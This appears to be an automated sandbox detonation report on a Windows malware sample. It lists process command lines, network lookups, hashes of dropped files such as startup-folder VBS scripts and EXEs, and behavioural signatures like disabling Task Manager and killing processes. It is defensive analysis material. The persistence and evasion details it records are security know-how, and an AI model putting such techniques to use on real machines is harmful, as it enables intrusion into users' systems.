"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xc4,0x108,0x7ffa6b1e46f8,0x7ffa6b1e4708,0x7ffa6b1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7824 /prefetch:1
C:\Windows\SysWOW64\timeout.exe
Timeout 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,13616467798609234517,10062836273621695748,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs"
C:\Windows\SysWOW64\timeout.exe
Timeout 55
Network
| US | 8.8.8.8:53 | drive-thirdparty.googleusercontent.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| GB | 216.58.201.97:443 | drive-thirdparty.googleusercontent.com | tcp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.203.85.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content.googleapis.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NyanCatIsHere.exe
| MD5 | aacce8318a2e5f0a43c8cd50907d6d29 |
| SHA1 | fd5da11bbbcdb2421186626f461cb48fc634760c |
| SHA256 | 7217260d8d9c6b0b6c8b797f64c516d8ebe4db48dc8a5fced46eab9082378724 |
| SHA512 | 8991368b7e5391b37c4584eedddfbb4041ddc554acad9742b390aad7b5b4791c106d1068b7c9c29cda9e14bd62e5c36894318246c247576162c54f30076190b5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Acid Rain.exe
| MD5 | b3904e987387ac3ff87b2d16e3e28156 |
| SHA1 | d575167f14fc84625b1525e8a0dfa27c514b1357 |
| SHA256 | 143bb189902ec44987f475f6fce4c0f90c072e5d732dae58b5f79a3c31b5f584 |
| SHA512 | a105063b598555d2b4c1a3950a7ac120ffc72ad362e6c76a364b48ff8c32e8daea48ef362b22aa62d848af1c20d3ef7c6536e717e874c6fad329ec0c22e9268f |
memory/4696-21-0x0000000000400000-0x0000000000423000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\65AF.tmp\Acid Rain.bat
| MD5 | 16a6fe0a61c21d85803c2b8383d5d3c2 |
| SHA1 | fec9adfac8c278c3dc548989a97c574ccdcb0934 |
| SHA256 | 1942dd34f70465202360d5f299e7160cea4d108ac4305a94dbabd9b97f4b7bd0 |
| SHA512 | 6dd03c5c69caf470584153e5e91ae074868e3002dcc76a07e1782c8d23fa8f309c09b0a50b787606be958f051ef0fdb67d24d0c91eee261549d6d60b857ce061 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 279e783b0129b64a8529800a88fbf1ee |
| SHA1 | 204c62ec8cef8467e5729cad52adae293178744f |
| SHA256 | 3619c3b82a8cbdce37bfd88b66d4fdfcd728a1112b05eb26998bea527d187932 |
| SHA512 | 32730d9124dd28c196bd4abcfd6a283a04553f3f6b050c057264bc883783d30d6602781137762e66e1f90847724d0e994bddf6e729de11a809f263f139023d3b |
\??\pipe\LOCAL\crashpad_2376_JTDHADGPFXJUSQVR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | cbec32729772aa6c576e97df4fef48f5 |
| SHA1 | 6ec173d5313f27ba1e46ad66c7bbe7c0a9767dba |
| SHA256 | d34331aa91a21e127bbe68f55c4c1898c429d9d43545c3253d317ffb105aa24e |
| SHA512 | 425b3638fed70da3bc16bba8b9878de528aca98669203f39473b931f487a614d3f66073b8c3d9bc2211e152b4bbdeceb2777001467954eec491f862912f3c7a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a019fd20637ad54654c6ca1d473b5341 |
| SHA1 | 46722480f198100e406af7590f49364afaa15f95 |
| SHA256 | 7fd954025d5fc43d5205881a42d56f2fa51590701d03cf0785dec9124ff2f300 |
| SHA512 | 8d24bf277e62d4501684ad14f015cc0519691532a09d8b4ad40adc3d161ac48c8635cbafe7f84c438839442553931dd293ec167ffc0472c4ae19daa242bb11f0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 361f52ce5a7922454368c1893b1bad73 |
| SHA1 | 9c5525b8fa5c2e6e1d16c0cd1eed35f6f4b18391 |
| SHA256 | cd03b3a8783f7028cf8c6f4f1474db97628789aefe9c408535d0348d9535bc03 |
| SHA512 | 00002c85ae14355838e111ce438748aed1a10ae6c56e62d28af1ca0aced9056e1cd97e191078e6d634cd60ec5ef4837bfb578616a5d3a921cb99fe895b4d6df6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7524a4c0a73f79a31dbccbc12f0396b4 |
| SHA1 | b246a7c4ddf5750bb9cc3cba4f02745d44ea8fe5 |
| SHA256 | 2053c4258660c8f0cfe828b30ae253e090e05a6ee5a35bd6d3b02849424abb7d |
| SHA512 | 62a32bbf930d186dfee3d9fef65f57fbdd849c0546c8c43dc403ab7a3de5416d3fce62582262f2d7f04a55da0630284a4039e0ceff514c4cfca57f7442922062 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 11fbcaf5e7074e9c4cb81aade5474d75 |
| SHA1 | 259dac025231921c51a44ffd32b88d89c3ee81cf |
| SHA256 | f77d79c32614bd435c3d05a79e50ba739f2ec6e537f1a017ffec135e91dd5393 |
| SHA512 | e46e316cb99463924ecf98aab56f73f7fcb17142bc3f4c16c7650ef7b6c72ffadb0b2f364d672f64cbf84f2b7119a983fb111284662a7f12370164b5f32bc332 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 0db16858f98587ce21433f84613c6924 |
| SHA1 | 2798dd5fae3ec06df3913ee8b7d3d4162fc81983 |
| SHA256 | f5dde6dd712f90552a73f62528c6d7d9aab76f503220f6fe6b375dafec0f4584 |
| SHA512 | a76dadf75650f2e7e6484ce8752fab533f93bb14d0b890767c5242b70d387f47d48df91eda7b386a2c0871fa5fcbc5008314892d8a34c741b6f5704b1d981e55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c1e8.TMP
| MD5 | 632fca4dc6dfcfc0d06a5c3239b90a31 |
| SHA1 | d6b230019dbc261aecd5719ff2a73508b4896c51 |
| SHA256 | 5ba25536ad7908be97c4a45cf61123c258aa571e26a8282120086382bf289b43 |
| SHA512 | 77be98d322b8cfcac2e1239b3f72580ef6da171c68212df6b56cff165320aa73fd5088a4fcf984a74fdeee5cf3f724fd4b7da66584467351f469107f651b26fe |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sodnciwkms.vbs
| MD5 | 139b5edf5ba8a4aa768281a29cac1649 |
| SHA1 | da8a2d689695a749288f161032e1f042122e89d5 |
| SHA256 | 1dd686325c7471a59a43142c6d7dec01047b3e95147254b235fbc3652f923a7c |
| SHA512 | ebf47fe1de3dca337a891330e7a97fbcf6c899a212be1c07f666d8d1179f116a70b4fcc66accfff3e3942ec83c79170882c8d48019feee0a02ffb57f66e61af8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 496f8a78c46b3f33fcbc75b6fe25a37f |
| SHA1 | 7e99c9735cb294098831e022a9db3fe5b50c47d6 |
| SHA256 | a250cfa45985eb088ae73fd0c4b4117e217ccef32dc8a19eae36e9f35c7ab4f2 |
| SHA512 | c00c9de6e22ed70d599776f86ac0a7894ae3fd26328d84ed6491956b3e14872e17ff4d8782585873c7a0dee36adc6f4a3e7b0cd23fa028354daf74f1693c19f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 51c98286c79d7027f088e9ad3e28c302 |
| SHA1 | 19690c6a99c1745b150ef7f91b82599a61282b83 |
| SHA256 | 2b57457ac063a6b0e5f37d8d2eb196442df19b4fbfb2f83f2fbbde313fc5f02e |
| SHA512 | 918f352401e85156e964e83ad0ea8f3cd440743ec0f311b4506de6133f10f8bb5bf56404a38f7ae3c5674c2474046276c2084eb3aa8f2cd12a1ed716008c79c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585d4e.TMP
| MD5 | b1528b160e2d190b0ea5bbee2a5cf736 |
| SHA1 | 9ca9a9c6eb18e6ab492a4c6ee906fb8afd085815 |
| SHA256 | 5d429911d4c740580df48ef969585e2df061c72cf23bda9f1bb95869f2fe865a |
| SHA512 | 457e3fc5c4b9aa7847969e362dce83017a6cee3a165a01492b72965eb951cf89952a182db79c0fced5b7df86145473c4936fc23ef5f7fb14f3b8f22f76fcc827 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 008114e1a1a614b35e8a7515da0f3783 |
| SHA1 | 3c390d38126c7328a8d7e4a72d5848ac9f96549b |
| SHA256 | 7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18 |
| SHA512 | a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a6a9b8960d263071187d182b7974d2ab |
| SHA1 | 74933ed0423d22f42dd99b1a343d808a31dac42a |
| SHA256 | 7c883e29bb97925b471301d89d2e582900a414eba4745e87a5ce68884076b543 |
| SHA512 | 86dda7116f94f15d3d6cb4fab57fde6217b4cb1adf9e080b690d37e3d349dae1c18fbb21f048f34b0ad10c2dfd569a56479c0370f8de032f3288ef4e00f32f92 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021
| MD5 | 89d79dbf26a3c2e22ddd95766fe3173d |
| SHA1 | f38fd066eef4cf4e72a934548eafb5f6abb00b53 |
| SHA256 | 367ef9ec8dc07f84fed51cac5c75dc1ac87688bbf8f5da8e17655e7917bd7b69 |
| SHA512 | ab7ce168e6f59e2250b82ec62857c2f2b08e5a548de85ac82177ac550729287ead40382a7c8a92fbce7f53b106d199b1c8adbb770e47287fc70ea0ea858faba6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022
| MD5 | b82ca47ee5d42100e589bdd94e57936e |
| SHA1 | 0dad0cd7d0472248b9b409b02122d13bab513b4c |
| SHA256 | d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d |
| SHA512 | 58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 9a0107076a89380e86d25b2f4c9d6e1e |
| SHA1 | 22975ec91a77e0333bdd7ab34f747ed070c10d8b |
| SHA256 | e98514fac8ec2c526c34912f1e7d15c29b44c72b7a3f9d6a5cf4eb499a71c07c |
| SHA512 | 0a6b1b51b282449af7506459bc751eac8da9201d6668f6ae3ae28324f2f5b3ad9e5ea98937f5076920fe0c0877b40bdc52b1a2ee69937310ab9f0326f4aec8a9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\68bb91177c1a462f_0
| MD5 | 5eb1bdcbeaba836098d9fcefd6db3a44 |
| SHA1 | 2456dc82f1430c67bfc18108895b813bf26f9c23 |
| SHA256 | 10db08ab3328fb1eb667ac2515e5ba83df2b1a5f354c65630486f457bf7fa0bb |
| SHA512 | 37872d12c88dcbc6de0bd80718ce4c9f269a8a0df403b9122be3996b5657866dff788d2304492a0d0364aba3c4a1452d329f91285fcf481206cf3e57c3cb610b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c8d05f7bb9b5d749_0
| MD5 | c3212ff3c41836e6bbfd0d8e9debb873 |
| SHA1 | 0595fae4d208e4b7d75a4306e790ecaf47d5d102 |
| SHA256 | 8d06c661fc0790f3a1859aa79841b67a4820a0a8ceeddedfaaf2223df719c366 |
| SHA512 | b19ac577e0fccb64f1e488258fe9d34b02d56032520738bb416786ef725b0f91e021801b1c376198162b40966adbf935dc7927287e8d6a4459fb5d7761417163 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5170db8681ca4a8146c51ae39efb5773 |
| SHA1 | 3e215439a68a3f461ab5d41b4a48df37a0e5d369 |
| SHA256 | e15b65f83b8440971213275e78310ca87a6f828156930f6dad1b5ff929d082c4 |
| SHA512 | 2ceab3c391dba26bb62eabeb08f3cf81b20d5f2933774c6a1d33aec2c1ca9f3edf1e2df4c1f79d6bd1320eb20786c973b58049f58dc57acc263ba6c0fccf26f9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n0rt0nant1ldks.vbs
| MD5 | 076eec2d750fb2a85461d8b227b96124 |
| SHA1 | d1a6638bc96e6e3adf0ca3e3cb4c846f77e365d8 |
| SHA256 | a596e5753416572e877fe630002dc42afdbfa9ca80473e1385017b37e082a1a4 |
| SHA512 | 5c6ff87335577061483cbf79333728085f198a4ee56fabab7d2fc401cbe8b146ee5ad174a6c1f5ba02095b186bb0f3729a5927b7fda4feeb6f5ae7411fa70ab5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 497b8c38d8c85120ef5f21eece038e6e |
| SHA1 | 6b2642996f6565c9b65827abcdf19983b86e9bc2 |
| SHA256 | 23d25c83f6cdbc656b7a36a250b8cbbc45ebf4d2ca7319bbffb879a26732a9d5 |
| SHA512 | 68b7b140f7ac2c5854e827cbb32fcb9c8b9f3c3112cce8c43c2e34d4db9946036b8ad63b912a9a7b0920eede93d60670a348123c6a527751e9080a0221aa3135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f5c39b9eddc5fd42_0
| MD5 | f8f9b521062b05c5ba5c12fb8093faff |
| SHA1 | df35c4034a5c66731d2d1c810cec5b53f96715f9 |
| SHA256 | 5c204b132f4d304f11c1aa188c117599b23fd1148b91593cd73b14feb8062649 |
| SHA512 | 4dc91c3391b796c1e179b8efb805d23ce7cc97535571e172e2884c5ead09e126a7339ff3286cc6bb861d0c06c24fe69b7283f180e1b8f23c59ed3fe4a872a0fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6fe5790011b495415b85a0a72a39d050 |
| SHA1 | c22f4d04ff97aeb7c5edb6687e7d865de15b0da1 |
| SHA256 | d885ab6e3a297bab898b4193aac36565728963d0291ccd5aab140077f2b07989 |
| SHA512 | fb6171411ac300166280b221c06f7d50b3d0f2f8b740fa893755da23081c3d8bf73758e07788f6df0147eac628a9d233a720224b8596e53b126700bbb4a504a8 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hifjdnfejfnejnkdpamzm.vbs
| MD5 | 70b06bab45636ed2ce89ffa1a56a2eda |
| SHA1 | 781043fb2a866fc38233be0b8beccd7fbeb0513d |
| SHA256 | a9644355bc115a7a8fce8603643254f8061cce0e1af9db037b2bda9ca62f4fff |
| SHA512 | a8a3d984b253e83c6ab4c4ad9b6ba773f69166204649be63d6850136523861e42132411d1fce3a83c4408f8051413101f5835136cecfad2b8022cc3489f004aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 89512132143859dbccabcdec0e45a649 |
| SHA1 | 8c039a9564ecada086f7f6713c85ee551fd3d252 |
| SHA256 | c90aa193d853c412d24c0eb4389c591612fcb69345e47193658ecb08c639be56 |
| SHA512 | 611fec23d3a1b5d2793b41419934855e7d0bebe8b2c74dffabb6cab70e411e551809ee06bec04a3a3b86ad0b96579cf471b12403b39902746cf87c54a0c93867 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:34
Platform
win7-20240221-en
Max time kernel
150s
Max time network
165s
Command Line
Signatures
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\START.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Killer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Error_icons.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New_Names.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe | N/A |
Loads dropped DLL
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2DB21D11-D8D4-11EE-83C2-E25BC60B6402} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
